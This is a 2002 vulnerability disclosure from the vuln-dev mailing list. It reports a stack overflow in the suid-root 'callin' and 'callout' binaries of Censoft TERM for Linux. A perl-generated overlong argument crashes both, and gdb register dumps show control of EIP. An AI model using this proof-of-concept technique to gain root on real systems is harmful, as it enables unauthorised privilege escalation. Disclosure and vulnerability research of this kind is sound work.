Censoft TERM Emu bOf

From: KF (dotslash@snosoft.com)
Date: 02/22/02 

Date: Fri, 22 Feb 2002 13:16:18 -0500
From: KF <dotslash@snosoft.com>
To: vuln-dev@security-focus.com

Vendor: www.censoft.com

Product: TERM for UNIX / Linux
Emulations Wyse 60, SCO ANSI, VT220 Terminal
Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm]

I WAS going to purchase this product after trying the eval however I changed my mind for some reason...I would Imagine the full
product is also vulnerable

[elguapo@linux elguapo]$ ftp ftp.censoft.com
Connected to ftp.censoft.com.
220 ns.centurysoftware.com FTP server (Version 6.00) ready.
Name (ftp.censoft.com:elguapo): anonymous
331 Guest login ok, send your email address as password.
Password:
230- Welcome To Century Software Ftp Server.
230-
230- Here you will find all the Century Software
230- Products.
230-
...
ftp> cd download/windows/linux
250 CWD command successful.
ftp> get termlx.tar
local: termlx.tar remote: termlx.tar
200 PORT command successful.
150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes).
226 Transfer complete.

As you can see the .tar file has some suid root stuff to play with
[elguapo@linux elguapo]$ tar tvf termlx.tar
-rwxr-xr-x root/root 630976 2000-04-01 02:00:00 term
-rwsr-xr-x root/root 96988 1999-03-22 23:52:10 callin
-rwsr-xr-x root/root 97144 1999-03-22 23:52:11 callout
-rwxr-xr-x root/root 94484 1999-03-22 23:52:10 brand

Aparantly I don't play nice
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'`
Arguments must be of form ttyNN
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

rm /etc/LCK..inittab if you need to try again or you will get the following message
Non-expired lockfile: /etc/LCK..inittab

Lets check the stack out a bit.
[root@linux /root]# gdb /home/elguapo/Censoft/callin core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0xbfffd3a4 -1073753180
edx 0x1 1
ebx 0x805fdf0 134610416
esp 0xbfffd3ec 0xbfffd3ec
ebp 0x42424242 0x42424242
esi 0xbfffd400 -1073753088
edi 0xbfffd858 -1073751976
eip 0x42424242 0x42424242

the callout binary is also affected.
[root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
Segmentation fault (core dumped)

[root@linux /root]# gdb /home/elguapo/Censoft/callout core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0xbfffd3a4 -1073753180
edx 0x1 1
ebx 0x805fe88 134610568
esp 0xbfffd3ec 0xbfffd3ec
ebp 0x42424242 0x42424242
esi 0xbfffd400 -1073753088
edi 0xbfffd856 -1073751978
eip 0x42424242 0x42424242

-KF